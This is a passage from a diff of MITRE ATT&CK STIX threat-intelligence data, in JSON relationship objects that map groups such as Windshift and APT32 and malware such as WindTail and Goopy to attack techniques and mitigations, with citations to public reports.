+ "created": "2020-06-24T22:37:51.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe and Windows Registry modifications to set the COR_PROFILER environment variable to execute a malicious DLL whenever a process loads the .NET CLR.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0e7ce20c-1a4f-4361-a954-1d7a164baca1",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:10.215Z",
+ "created": "2020-06-24T23:51:51.525Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4fb841dd-93d8-404a-8738-5fe19a53c730",
+ "type": "relationship",
+ "modified": "2020-06-25T17:22:29.070Z",
+ "created": "2020-06-25T17:22:29.070Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used e-mail attachments to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f7800d2b-7eb5-4efe-ac8d-503c187d18ef",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.169Z",
+ "created": "2020-06-25T17:48:41.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used links embedded in e-mails to lure victims into executing malicious code.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2332793b-afd0-407b-a1dc-97c5c7580bcb",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.195Z",
+ "created": "2020-06-25T17:48:41.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used revoked certificates to sign malware.(Citation: objective-see windtail1 dec 2018)(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--893c9a7a-7f2c-4b96-877e-06870d5f989f",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.211Z",
+ "created": "2020-06-25T17:48:41.211Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with links to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--88157c8d-48d7-4114-8783-d22999a8f990",
+ "type": "relationship",
+ "modified": "2020-06-25T17:48:41.203Z",
+ "created": "2020-06-25T17:48:41.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used icons mimicking MS Office files to mask malicious executables.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ad880548-e776-4e7b-995d-ce6fdc91e865",
+ "type": "relationship",
+ "modified": "2020-06-26T13:34:33.894Z",
+ "created": "2020-06-25T17:48:41.197Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with attachment to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--1ab045b8-35b4-4920-8223-d1a6b8c6ae1e",
+ "type": "relationship",
+ "modified": "2020-06-26T13:38:42.247Z",
+ "created": "2020-06-25T17:48:41.207Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs contentsOfDirectoryAtPath, pathExtension, and (string) compare.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e669c57-11e8-4088-904c-84940458be8e",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.604Z",
+ "created": "2020-06-25T18:24:00.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ec5259f2-5a6c-4d42-bf21-f91c2df64f61",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.644Z",
+ "created": "2020-06-25T18:24:00.644Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0c837763-c44c-45cc-8c44-332667481a31",
+ "type": "relationship",
+ "modified": "2020-06-26T13:30:57.649Z",
+ "created": "2020-06-25T18:24:00.652Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4642135b-65d9-4b61-b25c-648c674c02dc",
+ "type": "relationship",
+ "modified": "2020-06-25T18:24:00.656Z",
+ "created": "2020-06-25T18:24:00.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7a6c1581-a077-4c8f-8111-3264fa9e1e9c",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.117Z",
+ "created": "2020-06-25T18:41:35.117Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) can use the open command to execute an application.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6b4a458b-d87a-4dc4-a375-46f4c1e6449a",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.120Z",
+ "created": "2020-06-25T18:41:35.120Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ff019484-a6dc-4250-a9eb-9094f5c9d30f",
+ "type": "relationship",
+ "modified": "2020-06-25T18:41:35.164Z",
+ "created": "2020-06-25T18:41:35.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used compromised websites to register custom URL schemes on a remote system.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0c3668cf-32c1-420f-a1c0-0c8598360ad8",
+ "type": "relationship",
+ "modified": "2020-06-25T18:50:24.164Z",
+ "created": "2020-06-25T18:50:24.164Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--4a990ccb-7004-43b8-9328-37668e1a3b6d",
+ "type": "relationship",
+ "modified": "2020-06-25T19:12:25.014Z",
+ "created": "2020-06-25T19:12:25.014Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e5d930e9-775a-40ad-9bdb-b941d8dfe86b",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "relationship_type": "mitigates",
+ "description": "Consider updating Windows to the latest version and patch level to utilize the latest protective measures against UAC bypass.(Citation: Github UACMe)",
+ "id": "relationship--1b7972b8-9373-4f60-a0e5-7c1aca2c15a6",
+ "external_references": [
+ {
+ "url": "https://github.com/hfiref0x/UACME",
+ "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.",
+ "source_name": "Github UACMe"
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-07-07T12:42:39.291Z",
+ "created": "2020-06-25T19:57:54.836Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9",
+ "target_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335",
+ "relationship_type": "mitigates",
+ "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys associated with COR_PROFILER.",
+ "id": "relationship--0c597fa3-aeb4-472c-9fba-6855e5d512b0",
+ "type": "relationship",
+ "modified": "2020-06-26T16:09:59.174Z",
+ "created": "2020-06-25T23:24:45.188Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "relationship_type": "mitigates",
+ "description": "Limit access to the root account and prevent users from modifying PAM components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.",
+ "id": "relationship--327a2877-8820-4def-8cd8-787f06cfd987",
+ "type": "relationship",
+ "modified": "2020-07-13T21:23:01.478Z",
+ "created": "2020-06-26T04:01:09.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
+ "target_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "relationship_type": "mitigates",
+ "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information.",
+ "id": "relationship--22501b39-e106-4a7f-b915-013c30f47af8",
+ "type": "relationship",
+ "modified": "2020-07-13T21:23:01.471Z",
+ "created": "2020-06-26T04:01:09.881Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771",
+ "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--e12a3e0d-4ed1-467b-a2f1-ead1e58b8cae",
+ "type": "relationship",
+ "modified": "2020-06-26T04:01:09.897Z",
+ "created": "2020-06-26T04:01:09.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--0d1f9f5b-11ea-42c3-b5f4-63cce0122541",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--81603db2-a657-4716-a7ca-e6562799e98e",
+ "type": "relationship",
+ "modified": "2020-06-26T13:33:42.646Z",
+ "created": "2020-06-26T13:33:42.646Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "external_references": [
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) has used fake personas on social media to engage and target victims.(Citation: SANS Windshift August 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--241c2c47-3659-4899-bf5b-64f0ed94c916",
+ "type": "relationship",
+ "modified": "2020-06-26T13:46:14.290Z",
+ "created": "2020-06-26T13:46:14.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used COM scriptlets to download Cobalt Strike beacons.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--768a6678-4823-4af5-bfd9-1a92c562b9f2",
+ "type": "relationship",
+ "modified": "2020-06-26T14:21:13.786Z",
+ "created": "2020-06-26T14:21:13.786Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--18771b0e-2d4b-4f76-ae1e-9cdac1c77cd0",
+ "type": "relationship",
+ "modified": "2020-06-26T14:21:13.800Z",
+ "created": "2020-06-26T14:21:13.800Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--db296410-83e6-4716-af90-ae4b7e7f3171",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.980Z",
+ "created": "2020-06-26T16:17:18.138Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--82a053be-71c5-49d5-b1f9-9cf979511e85",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:56.007Z",
+ "created": "2020-06-26T16:17:18.159Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
